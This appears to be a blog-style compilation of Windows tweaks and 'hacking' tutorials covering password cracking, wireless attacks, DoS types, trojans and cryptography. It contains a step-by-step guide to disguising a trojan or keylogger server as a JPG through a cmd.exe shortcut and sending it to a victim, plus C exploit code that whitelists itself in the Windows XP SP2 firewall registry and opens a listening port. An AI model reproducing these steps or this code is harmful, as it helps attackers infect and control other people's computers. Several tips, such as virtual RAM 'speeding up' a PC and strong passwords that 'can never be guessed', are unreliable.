1) Select file, Press ‘F2′.

2) Hold ‘Alt’ key and type ‘0160′ from the numpad.

3) Release the ‘Alt’ key. Now without doing anything else, again hold ‘Alt’ key and type ‘0160′.

4) Press ‘Enter’ and you will have second nameless file in the same directory.

5) Repeat step 3 to create as many nameless files or folders in the same directory.

(We have a problem with deleting these folders, to do so, start your computer in ‘Safe Mode’ and delete it from there.)

Hide EXE File into JPG

This is a good trick to hide your exe files into a jpg file..!

How about sending a trojan or a keylogger into your victim using this trick..??

1) Firstly, create a new folder and make sure that the options ’show hidden files and folders’ is checked and ‘hide extensions for known file types’ is unchecked.
Basically what you need is to see hidden files and see the extension of all your files on your pc.

2) Paste a copy of your server on the new created folder. let’s say it’s called ’server.exe’ (that’s why you need the extension of files showing, cause you need to see it to change it)

3) Now you’re going to rename this ’server.exe’ to whatever you want, let’s say for example ‘picture.jpeg’

4) Windows is going to warn you if you really want to change this extension from exe to jpeg, click YES.

5) Now create a shortcut of this ‘picture.jpeg’ in the same folder.

6) Now that you have a shortcut, rename it to whatever you want, for example, ‘me.jpeg’.

7) Go to properties (on file me.jpeg) and now you need to do some changes there.

First of all delete all the text on field ‘Start In’ and leave it empty.

9) Then on field ‘Target’ you need to write the path to open the other file (the server renamed ‘picture.jpeg’) so you have to write this :-
‘C:\WINDOWS\system32\cmd.exe /c picture.jpeg’

10) The last field, ‘c picture.jpeg’ is always the name of the first file. If you called the first file ’soccer.avi’ you gotta write ‘C:\WINDOWS\system32\cmd.exe /c soccer.avi’.

11) So what you’re doing is when someone clicks on ‘me.jpeg’, a cmd will execute the other file ‘picture.jpeg’ and the server will run.

12) On that file ‘me.jpeg’ (shortcut), go to properties and you have an option to change the icon. Click that and a new window will pop up and you have to write this :-
%SystemRoot%\system32\SHELL32.dll . Then press OK.

13) You can set the properties ‘Hidden’ for the first file ‘picture.jpeg’ if you think it’s better to get a connection from someone.

14) But don’t forget one thing, these 2 files must always be together in the same folder and to get connected to someone they must click on the shortcut created not on the first file. So rename the files to whatever you want considering the person and the knowledge they have on this matter.

15) For me for example I always want the shortcut showing first so can be the first file to be opened. So I rename the server to ‘picture2.jpeg’ and the shortcut to ‘picture1.jpeg’.
This way the shortcut will show up first. If you set hidden properties to the server ‘picture.jpeg’ then you don’t have to bother with this detail but I’m warning you, the hidden file will always show up inside of a Zip or a Rar file.

16) So the best way to send these files together to someone is compress them into Zip or Rar.

17) inside the Rar or Zip file you can see the files properties and even after all this work you can see that the shortcut is recognized like a shortcut but hopefully the person you sent this too doesn’t know that and is going to open it.

A Simple Tweak (XP Pro only) which will increase your Broadband Speed. Make sure you Log on as Administrator, not as a user with Administrator priv

A Simple Tweak (XP Pro only) which will increase your Broadband Speed.

Make sure you Log on as Administrator, not as a user with Administrator privileges.

Follow the steps as given below-

1) Click on Start Button.

2) Select Run From Start Menu.

3) Type gpedit.msc

4) Expand the [Administrative Templates] branch.

5) Then Expand the [Network] branch.

6) Highlight(Select by Single Click) [QoS Packet Scheduler]

7) Double-click [Limit Reservable Bandwidth] (Available in Right Side Panel)

Check(Select By Single Click on it) [Enabled]

9) Change [Bandwidth limit %] to 0 %

10) Click [OK] Button.

11) Restart Your PC.

12) Now Check Your Broadband Speed.

Increase Broadband Speed Using Simple Tweak

Folder Lock Without Any Software

Folder Lock With Password Without Any Software-

Paste the code given below in notepad and ‘Save’ it as batch file (with extension ‘.bat’).Any name will do.

Then you see a batch file. Double click on this batch file to create a folder locker.New folder named ‘Locker’ would be formed at the same location.Now bring all the files you want to hide in the ‘Locker’ folder. Double click on the batch file to lock the folder namely ‘Locker’.

If you want to unlock your files,double click the batch file again and you would be prompted for password.

Enter the password and enjoy access to the folder.

if EXIST “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}” goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p “cho=>”
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
attrib +h +s “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p “pass=>”
if NOT %pass%==type your password here goto FAIL
attrib -h -s “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
ren “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}” Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End

Remove shortcut arrow from desktop icons completely in XP

To remove shortcut arrow from desktop icons in any type of document:

a) Perform instructions described under ‘Remove shortcut arrow from desktop icons’. For your convenience, steps 1 to 3 are reported here.

b) Perform instructions described under ‘Remove shortcut arrow from desktop icons (2)’. For your convenience, steps 4 and 5 are reported here.

c) And finally, do the same with conferencelink, docshortcut, internetshortcut and wshfile.

So, here is a summary of all actions:

1. Start regedit.
2. Navigate to HKEY_CLASSES_ROOT\lnkfile
3. Delete the IsShortcut registry value.

4. Navigate to HKEY_CLASSES_ROOT\piffile
5. Delete the IsShortcut registry value.

6. Navigate to HKEY_CLASSES_ROOT\ConferenceLink
7. Delete the IsShortcut registry value.
8. Navigate to HKEY_CLASSES_ROOT\DocShortCut
9. Delete the IsShortcut registry value.
10.Navigate to HKEY_CLASSES_ROOT\InternetShortcut
11. Delete the IsShortcut registry value.
12. Navigate to HKEY_CLASSES_ROOT\WSHFile
13. Delete the IsShortcut registry value.

14. Close regedit.

Logoff and… Enjoy!

Note : Please note that in some cases deactivating the arrow for *.LNK files might lead to duplicate items in the Explorer Context menu.

Increase Virtual RAM – To Make Your System Faster

Follow the steps given below :-

1) Hold down the ‘Windows’ Key and Press the ‘Pause/Break’ button at the top right of your keyboard.
Another way is Right-Clicking ‘My Computer’ and then Select ‘Properties’.

2) Click on the ‘Advanced’ tab.

3) Under ‘Performance’, click ‘Settings’.

4) Then click the ‘Advanced’ tab on the button that pops up.

5) Under ‘Virtual Memory’ at the bottom, click ‘Change’.

6) Click the ‘Custom Size’ button.

7) For the initial size (depending on your HD space), type in anywhere from 1000-1500 (although I use 4000), and for the Maximum size type in anywhere from 2000-2500 (although I use 6000).

Click ‘Set’, and then exit out of all of the windows.

9) Finally, Restart your computer.

10) You now have a faster computer and 1-2GB of Virtual RAM..!

Disable Error Report In Windows

Microsoft’s Error Reporting in windows sometimes is disturbing, most of us don’t want to send that error report because it’s of no use.
There’s an easy way to disable Microsoft error report in windows.

Disable Microsoft Error report in Windows XP:
1) Open Control Panel (Start > Control Panel)
2) Open the Problem Reports & Solutions applet Under advanced options and disable error reporting.

Disable Microsoft Error report in Windows Vista:
1) Right click on my computer (Desktop) and click properties
2) Click the Advanced Tab
3) You’ll see a “Error reporting” button at the bottom, click it
4) Select Disable Error Reporting.

And you’re done….!

Network Hacking

Network Hacking is generally means gathering information about domain by using tools like Telnet, NslookUp, Ping, Tracert, Netstat, etc.
It also includes OS Fingerprinting, Port Scaning and Port Surfing using various tools.

Ping :- Ping is part of ICMP (Internet Control Message Protocol) which is used to troubleshoot TCP/IP networks. So, Ping is basically a command that allows you to check whether the host is alive or not.
To ping a particular host the syntax is (at command prompt)–
c:/>ping hostname.com

example:- c:/>ping www.google.com

Various attributes used with ‘Ping’ command and their usage can be viewed by just typing c:/>ping at the command prompt.

Netstat :- It displays protocol statistics and current TCP/IP network connections. i.e. local address, remote address, port number, etc.
It’s syntax is (at command prompt)–
c:/>netstat -n

Telnet :- Telnet is a program which runs on TCP/IP. Using it we can connect to the remote computer on particular port. When connected it grabs the daemon running on that port.
The basic syntax of Telnet is (at command prompt)–
c:/>telnet hostname.com

By default telnet connects to port 23 of remote computer.
So, the complete syntax is-
c:/>telnet www.hostname.com port

example:- c:/>telnet www.yahoo.com 21 or c:/>telnet 192.168.0.5 21

Tracert :- It is used to trace out the route taken by the certain information i.e. data packets from source to destination.
It’s syntax is (at command prompt)–
c:/>tracert www.hostname.com

example:- c:/>tracert www.insecure.in

Here “* * * Request timed out.” indicates that firewall installed on that system block the request and hence we can’t obtain it’s IP address.

various attributes used with tracert command and their usage can be viewed by just typing c:/>tracert at the command prompt.

The information obtained by using tracert command can be further used to find out exact operating system running on target system.

Password Hacking

Password cracking is the process of recovering secret passwords from data that has been stored in or transmitted by a computer system. A common approach is to repeatedly try guesses for the password.
Most passwords can be cracked by using following techniques :

1) Hashing :- Here we will refer to the one way function (which may be either an encryption function or cryptographic hash) employed as a hash and its output as a hashed password.
If a system uses a reversible function to obscure stored passwords, exploiting that weakness can recover even ‘well-chosen’ passwords.
One example is the LM hash that Microsoft Windows uses by default to store user passwords that are less than 15 characters in length.
LM hash breaks the password into two 7-character fields which are then hashed separately, allowing each half to be attacked separately.

Hash functions like SHA-512, SHA-1, and MD5 are considered impossible to invert when used correctly.

2) Guessing :- Many passwords can be guessed either by humans or by sophisticated cracking programs armed with dictionaries (dictionary based) and the user’s personal information.

Not surprisingly, many users choose weak passwords, usually one related to themselves in some way. Repeated research over some 40 years has demonstrated that around 40% of user-chosen passwords are readily guessable by programs. Examples of insecure choices include:

* blank (none)
* the word “password”, “passcode”, “admin” and their derivatives
* the user’s name or login name
* the name of their significant other or another person (loved one)
* their birthplace or date of birth
* a pet’s name
* a dictionary word in any language
* automobile licence plate number
* a row of letters from a standard keyboard layout (eg, the qwerty keyboard — qwerty itself, asdf, or qwertyuiop)
* a simple modification of one of the preceding, such as suffixing a digit or reversing the order of the letters.
and so on….

In one survery of MySpace passwords which had been phished, 3.8 percent of passwords were a single word found in a dictionary, and another 12 percent were a word plus a final digit; two-thirds of the time that digit was.

A password containing both uppercase & lowercase characters, numbers and special characters too; is a strong password and can never be guessed.

3) Default Passwords :- A moderately high number of local and online applications have inbuilt default passwords that have been configured by programmers during development stages of software. There are lots of applications running on the internet on which default passwords are enabled. So, it is quite easy for an attacker to enter default password and gain access to sensitive information. A list containing default passwords of some of the most popular applications is available on the internet.

Always disable or change the applications’ (both online and offline) default username-password pairs.

4) Brute Force :- If all other techniques failed, then attackers uses brute force password cracking technique. Here an automatic tool is used which tries all possible combinations of available keys on the keyboard. As soon as correct password is reached it displays on the screen.This techniques takes extremely long time to complete, but password will surely cracked.

Long is the password, large is the time taken to brute force it.

5) Phishing :- This is the most effective and easily executable password cracking technique which is generally used to crack the passwords of e-mail accounts, and all those accounts where secret information or sensitive personal information is stored by user such as social networking websites, matrimonial websites, etc.
Phishing is a technique in which the attacker creates the fake login screen and send it to the victim, hoping that the victim gets fooled into entering the account username and password. As soon as victim click on “enter” or “login” login button this information reaches to the attacker using scripts or online form processors while the user(victim) is redirected to home page of e-mail service provider.

Never give reply to the messages which are demanding for your username-password, urging to be e-mail service provider.

It is possible to try to obtain the passwords through other different methods, such as social engineering, wiretapping, keystroke logging, login spoofing, dumpster diving, phishing, shoulder surfing, timing attack, acoustic cryptanalysis, using a Trojan Horse or virus, identity management system attacks (such as abuse of Self-service password reset) and compromising host security.
However, cracking usually designates a guessing attack.

Wireless Hacking

Wireless networks broadcast their packets using radio frequency or optical wavelengths. A modern laptop computer can listen in. Worse, an attacker can manufacture new packets on the fly and persuade wireless stations to accept his packets as legitimate.
The step by step procerdure in wireless hacking can be explained with help of different topics as follows:-

1) Stations and Access Points :- A wireless network interface card (adapter) is a device, called a station, providing the network physical layer over a radio link to another station.
An access point (AP) is a station that provides frame distribution service to stations associated with it.
The AP itself is typically connected by wire to a LAN. Each AP has a 0 to 32 byte long Service Set Identifier (SSID) that is also commonly called a network name. The SSID is used to segment the airwaves for usage.

2) Channels :- The stations communicate with each other using radio frequencies between 2.4 GHz and 2.5 GHz. Neighboring channels are only 5 MHz apart. Two wireless networks using neighboring channels may interfere with each other.

3) Wired Equivalent Privacy (WEP) :- It is a shared-secret key encryption system used to encrypt packets transmitted between a station and an AP. The WEP algorithm is intended to protect wireless communication from eavesdropping. A secondary function of WEP is to prevent unauthorized access to a wireless network. WEP encrypts the payload of data packets. Management and control frames are always transmitted in the clear. WEP uses the RC4 encryption algorithm.

4) Wireless Network Sniffing :- Sniffing is eavesdropping on the network. A (packet) sniffer is a program that intercepts and decodes network traffic broadcast through a medium. It is easier to sniff wireless networks than wired ones. Sniffing can also help find the easy kill as in scanning for open access points that allow anyone to connect, or capturing the passwords used in a connection session that does not even use WEP, or in telnet, rlogin and ftp connections.

5 ) Passive Scanning :- Scanning is the act of sniffing by tuning to various radio channels of the devices. A passive network scanner instructs the wireless card to listen to each channel for a few messages. This does not reveal the presence of the scanner. An attacker can passively scan without transmitting at all.

6) Detection of SSID :- The attacker can discover the SSID of a network usually by passive scanning because the SSID occurs in the following frame types: Beacon, Probe Requests, Probe Responses, Association Requests, and Reassociation Requests. Recall that management frames are always in the clear, even when WEP is enabled.
When the above methods fail, SSID discovery is done by active scanning

7) Collecting the MAC Addresses :- The attacker gathers legitimate MAC addresses for use later in constructing spoofed frames. The source and destination MAC addresses are always in the clear in all the frames.

Collecting the Frames for Cracking WEP :- The goal of an attacker is to discover the WEP shared-secret key. The attacker sniffs a large number of frames An example of a WEP cracking tool is AirSnort ( http://airsnort.shmoo.com ).

9) Detection of the Sniffers :- Detecting the presence of a wireless sniffer, who remains radio-silent, through network security measures is virtually impossible. Once the attacker begins probing (i.e., by injecting packets), the presence and the coordinates of the wireless device can be detected.

10) Wireless Spoofing :- There are well-known attack techniques known as spoofing in both wired and wireless networks. The attacker constructs frames by filling selected fields that contain addresses or identifiers with legitimate looking but non-existent values, or with values that belong to others. The attacker would have collected these legitimate values through sniffing.

11) MAC Address Spoofing :- The attacker generally desires to be hidden. But the probing activity injects frames that are observable by system administrators. The attacker fills the Sender MAC Address field of the injected frames with a spoofed value so that his equipment is not identified.

12) IP spoofing :- Replacing the true IP address of the sender (or, in rare cases, the destination) with a different address is known as IP spoofing. This is a necessary operation in many attacks.

13) Frame Spoofing :- The attacker will inject frames that are valid but whose content is carefully spoofed.

14) Wireless Network Probing :- The attacker then sends artificially constructed packets to a target that trigger useful responses. This activity is known as probing or active scanning.

15) AP Weaknesses :- APs have weaknesses that are both due to design mistakes and user interfaces

16) Trojan AP :- An attacker sets up an AP so that the targeted station receives a stronger signal from it than what it receives from a legitimate AP.

17) Denial of Service :- A denial of service (DoS) occurs when a system is not providing services to authorized clients because of resource exhaustion by unauthorized clients. In wireless networks, DoS attacks are difficult to prevent, difficult to stop. An on-going attack and the victim and its clients may not even detect the attacks. The duration of such DoS may range from milliseconds to hours. A DoS attack against an individual station enables session hijacking.

18) Jamming the Air Waves :- A number of consumer appliances such as microwave ovens, baby monitors, and cordless phones operate on the unregulated 2.4GHz radio frequency. An attacker can unleash large amounts of noise using these devices and jam the airwaves so that the signal to noise drops so low, that the wireless LAN ceases to function.

19) War Driving :- Equipped with wireless devices and related tools, and driving around in a vehicle or parking at interesting places with a goal of discovering easy-to-get-into wireless networks is known as war driving. War-drivers (http://www.wardrive.net) define war driving as “The benign act of locating and logging wireless access points while in motion.” This benign act is of course useful to the attackers.
Regardless of the protocols, wireless networks will remain potentially insecure because an attacker can listen in without gaining physical access.

Tips for Wireless Home Network Security

1) Change Default Administrator Passwords (and Usernames)
2) Turn on (Compatible) WPA / WEP Encryption
3) Change the Default SSID
4) Disable SSID Broadcast
5) Assign Static IP Addresses to Devices
6) Enable MAC Address Filtering
7) Turn Off the Network During Extended Periods of Non-Use
Position the Router or Access Point Safely

Denial Of Service (DoS) Attacks

A denial of service (DoS) attack is an attack that clogs up so much memory on the target system that it can not serve it’s users, or it causes the target system to crash, reboot, or otherwise deny services to legitimate users.There are several different kinds of dos attacks as discussed below:-

1) Ping Of Death :- The ping of death attack sends oversized ICMP datagrams (encapsulated in IP packets) to the victim.The Ping command makes use of the ICMP echo request and echo reply messages and it’s commonly used to determine whether the remote host is alive. In a ping of death attack, however, ping causes the remote system to hang, reboot or crash. To do so the attacker uses, the ping command in conjuction with -l argument (used to specify the size of the packet sent) to ping the target system that exceeds the maximum bytes allowed by TCP/IP (65,536).
example:- c:/>ping -l 65540 hostname
Fortunately, nearly all operating systems these days are not vulnerable to the ping of death attack.

2) Teardrop Attack :- Whenever data is sent over the internet, it is broken into fragments at the source system and reassembled at the destination system. For example you need to send 3,000 bytes of data from one system to another. Rather than sending the entire chunk in asingle packet, the data is broken down into smaller packets as given below:
* packet 1 will carry bytes 1-1000.
* packet 2 will carry bytes 1001-2000.
* packet 3 will carry bytes 2001-3000.
In teardrop attack, however, the data packets sent to the target computer contais bytes that overlaps with each other.
(bytes 1-1500) (bytes 1001-2000) (bytes 1500-2500)
When the target system receives such a series of packets, it can not reassemble the data and therefore will crash, hang, or reboot.
Old Linux systems, Windows NT/95 are vulnerable.

3) SYN – Flood Attack :- In SYN flooding attack, several SYN packets are sent to the target host, all with an invalid source IP address. When the target system receives these SYN packets, it tries to respond to each one with a SYN/ACK packet but as all the source IP addresses are invalid the target system goes into wait state for ACK message to receive from source. Eventually, due to large number of connection requests, the target systems’ memory is consumed. In order to actually affect the target system, a large number of SYN packets with invalid IP addresses must be sent.

4) Land Attack :- A land attack is similar to SYN attack, the only difference being that instead of including an invalid IP address, the SYN packet include the IP address of the target sysetm itself. As a result an infinite loop is created within the target system, which ultimately hangs and crashes.Windows NT before Service Pack 4 are vulnerable to this attack.

5) Smurf Attack :- There are 3 players in the smurf attack–the attacker,the intermediary (which can also be a victim) and the victim. In most scenarios the attacker spoofs the IP source address as the IP of the intended victim to the intermediary network broadcast address. Every host on the intermediary network replies, flooding the victim and the intermediary network with network traffic.

Result:- Performance may be degraded such that the victim, the victim and intermediary networks become congested and unusable, i.e. clogging the network and preventing legitimate users from obtaining network services.

6) UDP – Flood Attack :- Two UDP services: echo (which echos back any character received) and chargen (which generates character) were used in the past for network testing and are enabled by default on most systems. These services can be used to launch a DOS by connecting the chargen to echo ports on the same or another machine and generating large amounts of network traffic.

7) Distributed Denial Of Service (DDoS) :- In Distributed DoS attack, there are 100 or more different attackers (systems) attacking the single system. Due to higher number of attackers DDoS attack is more effective and dangerous than regular DoS attack. The attackers have control over master zombies, which, in turn, have control over slave zombies, as shown in figure.

8) Distributed Denial Of Service with Reflectors (DRDoS) :- In DRDoS attacks the army of the attacker consists of master zombies, slave zombies, and reflectors. The difference in this type of attack is that slave zombies are led by master zombies to send a stream of packets with the victim’s IP address as the source IP address to other uninfected machines (known as reflectors), exhorting these machines to connect with the victim. Then the reflectors send the victim a greater volume of traffic, as a reply to its exhortation for the opening of a new connection, because they believe that the victim was the host that asked for it. Therefore, in DRDoS attacks, the attack is mounted by noncompromised machines, which mount the attack without being aware of the action.

a DRDoS attack creates a greater volume of traffic because of its more distributed nature, as shown in the figure below.

Privacy Attacks

Here attacker uses various automated tools which are freely available on the internet. Some of them are as follows:

1) Trojan :- Trojan is a Remote Administration Tool (RAT) which enable attacker to execute various software and hardware instructions on the target system.

Most trojans consist of two parts -
a) The Server Part :- It has to be installed on the the victim’s computer.
b) The Client Part :- It is installed on attacker’s system. This part gives attacker complete control over target computer.

Netbus, Girlfriend, sub7, Beast, Back Orifice are some of the popular trojans.

2) Keylogger :- Keyloggers are the tools which enable attacker to record all the keystrokes made by victim and send it’s logs secretly to the attacker’s e-mail address which is previously set by him.

Almost all the Trojans have keylogging function. Use of latest updated antirus-firewall, detect the presence of trojan and remove it permanently.

3) Spyware :- Spyware utilities are the malicious programs that spy on the activities of victim, and covertly pass on the recorded information to the attacker without the victim’s consent. Most spyware utilities monitor and record the victim’s internet-surfing habits. Typically, a spyware tool is built into a host .exe file or utility. If a victim downloads and executes an infected .exe file, then the spyware becomes active on the victim’s system.
Spyware tools can be hidden both in .exe files an even ordinary cookie files.
Most spyware tools are created and released on the internet with the aim of collecting useful information about a large number of Internet users for marketing and advertising purposes. On many occasions, attacker also use spyware tools for corporate espionage and spying purposes.

4) Sniffer :- Sniffers were originally developed as a tool for debugging/troubleshooting network problems.
The Ethernet based sniffer works with network interface card (NIC) to capture interprete and save the data packets sent across the network.
Sniffer can turn out to be quite dangerous. If an attacker manages to install a sniffer on your system or the router of your network, then all data including passwords, private messages, company secrets, etc. get captured.

Cryptography

By definition cryptography is the process of converting recognisable data into an encrypted code for transmitting it over a network (either trusted or untrusted). Data is encrypted at the source, i.e. sender’s end and decrypted at the destination, i.e. receiver’s end.

In all cases, the initial unencrypted data is referred to as plaintext. It is encrypted into ciphertext, which will in turn (usually) be decrypted into usable plaintext using different encryption algorithms.

The Purpose :-

* Authentication : The process of proving one’s identity.
* Privacy/confidentiality : Ensuring that no one can read the message except the intended receiver.
* Integrity : Assuring the receiver that the received message has not been altered in any way from the original.
* Non-repudiation : A mechanism to prove that the sender really sent this message.

In general cryptographic algorithms are classified into three categories as follows :

1) Secret Key Cryptography (SKC) : Uses a single key for both encryption and decryption.
2) Public Key Cryptography (PKC) : Uses one key for encryption and another for decryption.
3) Hash Functions : Uses a mathematical transformation to irreversibly “encrypt” information.

Secret Key Cryptography :- With secret key cryptography, a single key is used for both encryption and decryption. Because a single key is used for both functions, secret key cryptography is also called symmetric encryption.

Secret key cryptography algorithms that are in use today include :

1) Data Encryption Standard (DES) : DES is a block-cipher employing a 56-bit key that operates on 64-bit blocks. DES uses a key of only 56 bits, and thus it is now susceptible to “brute force” attacks.
Triple-DES (3DES) and DESX are the two important variants that strengthen DES.

2) Advanced Encryption Standard (AES ) : The algorithm can use a variable block length and key length; the latest specification allowed any combination of keys lengths of 128, 192, or 256 bits and blocks of length 128, 192, or 256 bits.

3 ) International Data Encryption Algorithm (IDEA) : Secret-key cryptosystem written by Xuejia Lai and James Massey, in 1992 and patented by Ascom; a 64-bit SKC block cipher using a 128-bit key. Also available internationally.

4) Rivest Ciphers : Named for Ron Rivest, a series of SKC algorithms.

RC1 : Designed on paper but never implemented.
RC2 : A 64-bit block cipher using variable-sized keys designed to replace DES. It’s code has not been made public although many companies have licensed RC2 for use in their products. Described in RFC 2268.
RC3 : Found to be breakable during development.
RC4 : A stream cipher using variable-sized keys; it is widely used in commercial cryptography products, although it can only be exported using keys that are 40 bits or less in length.
RC5 : A block-cipher supporting a variety of block sizes, key sizes, and number of encryption passes over the data. Described in RFC 2040.
RC6 : An improvement over RC5, RC6 was one of the AES Round 2 algorithms.

5) Blowfish : A symmetric 64-bit block cipher invented by Bruce Schneier; optimized for 32-bit processors with large data caches, it is significantly faster than DES on a Pentium/PowerPC-class machine. Key lengths can vary from 32 to 448 bits in length. Blowfish, available freely and intended as a substitute for DES or IDEA, is in use in over 80 products.
Public-Key Cryptography :- Generic PKC employs two keys that are mathematically related although knowledge of one key does not allow someone to easily determine the other key. One key is used to encrypt the plaintext and the other key is used to decrypt the ciphertext. No matter which key is applied first, but both the keys are required for the process to work. Because a pair of keys are required, this approach is also called asymmetric cryptography.
In PKC, one of the keys is designated the public key and may be advertised as widely as the owner wants. The other key is designated the private key and is never revealed to another party.

Public-key cryptography algorithms that are in use today for key exchange or digital signatures include :

1) RSA : One of the most popular encryption algorithm, invented in 1977 by three MIT scientists (Ronald Rivest, Adi Shamir, and Leonard Adleman)
The key-pair is derived from a very large number, n, that is the product of two prime numbers chosen according to special rules; these primes may be 100 or more digits in length each, yielding an n with roughly twice as many digits as the prime factors. The public key information includes n and a derivative of one of the factors of n; an attacker cannot determine the prime factors of n (and, therefore, the private key) from this information alone and that is what makes the RSA algorithm so secure.

Hash Functions :- Hash functions, also called message digests and one-way encryption, are algorithms that, in some sense, use no key. Instead, a fixed-length hash value is computed based upon the plaintext that makes it impossible for either the contents or length of the plaintext to be recovered. Hash algorithms are typically used to provide a digital fingerprint of a file’s contents, often used to ensure that the file has not been altered by an intruder or virus. Hash functions are also commonly employed by many operating systems to encrypt passwords. Hash functions, then, provide a measure of the integrity of a file.

Hash algorithms that are in common use today include:

1) Message Digest (MD) algorithms : A series of byte-oriented algorithms that produce a 128-bit hash value from an arbitrary-length message.

MD2 : Designed for systems with limited memory, such as smart cards.

MD4 : Developed by Rivest, similar to MD2 but designed specifically for fast processing in software.

MD5 : Also developed by Rivest in 1991 after potential weaknesses were reported in MD4; this scheme is similar to MD4 but is slower because more manipulation is made to the original data.It accepts variable length message from the user and converts it into a fixed 128-bit message digest value.

One interesting and important aspect of the MD5 hash function is that it is a one way algorithm. This means you can produce the 128-bit fingerprint if the data chunk is available to you. You cannot, however, generate the entire data if only the fingerprint of the data is known.

2) Secure Hash Algorithm (SHA) : Algorithm for NIST’s Secure Hash Standard (SHS). SHA-1 produces a 160-bit hash value and was originally published as FIPS 180-1 and RFC 3174. FIPS 180-2 describes five algorithms in the SHS: SHA-1 plus SHA-224, SHA-256, SHA-384, and SHA-512 which can produce hash values that are 224, 256, 384, or 512 bits in length, respectively. SHA-224, -256, -384, and -52 are also described in RFC 4634.

3) RIPEMD : A series of message digests that initially came from the RIPE (RACE Integrity Primitives Evaluation) project. RIPEMD-160 was designed by Hans Dobbertin, Antoon Bosselaers, and Bart Preneel, and optimized for 32-bit processors to replace the then-current 128-bit hash functions. Other versions include RIPEMD-256, RIPEMD-320, and RIPEMD-128.

4) HAVAL (HAsh of VAriable Length) : Designed by Y. Zheng, J. Pieprzyk and J. Seberry, a hash algorithm with many levels of security. HAVAL can create hash values that are 128, 160, 192, 224, or 256 bits in length.

5) Whirlpool : A relatively new hash function, designed by V. Rijmen and P.S.L.M. Barreto. Whirlpool operates on messages less than 2256 bits in length, and produces a message digest of 512 bits. The design of this hash function is very different than that of MD5 and SHA-1, making it immune to the same attacks as on those hashes.

6) Tiger : Designed by Ross Anderson and Eli Biham, Tiger is designed to be secure, run efficiently on 64-bit processors, and easily replace MD4, MD5, SHA and SHA-1 in other applications. Tiger/192 produces a 192-bit output and is compatible with 64-bit architectures; Tiger/128 and Tiger/160 produce the first 128 and 160 bits, respectively, to provide compatibility with the other hash functions.

Bypassing Windows-XP Firewall

There is a technique using which we can bypass windows-xp service pack-2 firewall.

This techniques is nothing but the vulnerability found in windows-xp sp2 firewall.
This is explained here in detail with exploit code.

Windows XP Firewall Bypassing (Registry Based) :- Microsoft Windows XP SP2 comes bundled with a Firewall. Direct access to Firewall’s registry keys allow local attackers to bypass the Firewall blocking list and allow malicious program to connect the network.

Credit :-
The information has been provided by Mark Kica.
The original article can be found at: http://taekwondo-itf.szm.sk/bugg.zip

Vulnerable Systems :-
* Microsoft Windows XP SP2

Windows XP SP2 Firewall has list of allowed program in registry which are not properly protected from modification by a malicious local attacker.

If an attacker adds a new key to the registry address of HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List, the attacker can enable his malware or Trojan to connect to the Internet without the Firewall triggering a warning.

Proof of Concept :-
Launch the regedit.exe program and access the keys found under the following path:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List

Add an entry key such as this one:
Name: C:\chat.exe
Value: C:\chat.exe:*:Enabled:chat

Exploit :-

#include
#include
#include
#include
#include “Shlwapi.h”int main( int argc, char *argv [] )
{
char buffer[1024];
char filename[1024];

HKEY hKey;
int i;

GetModuleFileName(NULL, filename, 1024);

strcpy(buffer, filename);
strcat(buffer, “:*:Enabled:”);
strcat(buffer, “bugg”);

RegOpenKeyEx(

HKEY_LOCAL_MACHINE,
“SYSTEM\\CurrentControlSet\\Services” “\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile” “\\AuthorizedApplications\\List”,
0,
KEY_ALL_ACCESS,
&hKey);

RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));

int temp, sockfd, new_fd, fd_size;
struct sockaddr_in remote_addr;

fprintf(stdout, “Simple server example with Anti SP2 firewall trick \n”);
fprintf(stdout, ” This is not trojan \n”);
fprintf(stdout, ” Opened port is :2001 \n”);
fprintf(stdout, “author:Mark Kica student of Technical University Kosice\n”);
fprintf(stdout, “Dedicated to Katka H. from Levoca \n”);

sleep(3);

if ((sockfd = ezsocket(NULL, NULL, 2001, SERVER)) == -1)
return 0;

for (; ; )
{
RegDeleteValue(hKey, filename);
fd_size = sizeof(struct sockaddr_in);

if ((new_fd = accept(sockfd, (struct sockaddr *)&remote_addr, &fd_size)) == -1)
{
perror(”accept”);
continue;
}
temp = send(new_fd, “Hello World\r\n”, strlen(”Hello World\r\n”), 0);
fprintf(stdout, “Sended: Hello World\r\n”);
temp = recv(new_fd, buffer, 1024, 0);
buffer[temp] = ”;
fprintf(stdout, “Recieved: %s\r\n”, buffer);
ezclose_socket(new_fd);
RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));

if (!strcmp(buffer, “quit”))
break;
}

ezsocket_exit();
return 0;
}

/* EoF */

A Note to all beginners for Hacking

Hacker, nowadays this is a very powerfull tag, used by a lot of people that may be or not be a hacker. By definition, Hacking is Gaining access to restricted areas by exploitation of errors or other means. is this right? Doing that makes me hacker?

Not quite.

Hacking is a lifestyle, and this starts sounding as a clinch? but Hacking is really a lifestyle.

A hacker understands knowledge and hunts it.

Hackers decide what to do with the knowledge, they may be destructive, which in my opinion is a bad decision, or they could be constructive, a helper, ethical. (even tho anyone is "bad" at times).4

-Aman Pratap

Hacker's Choice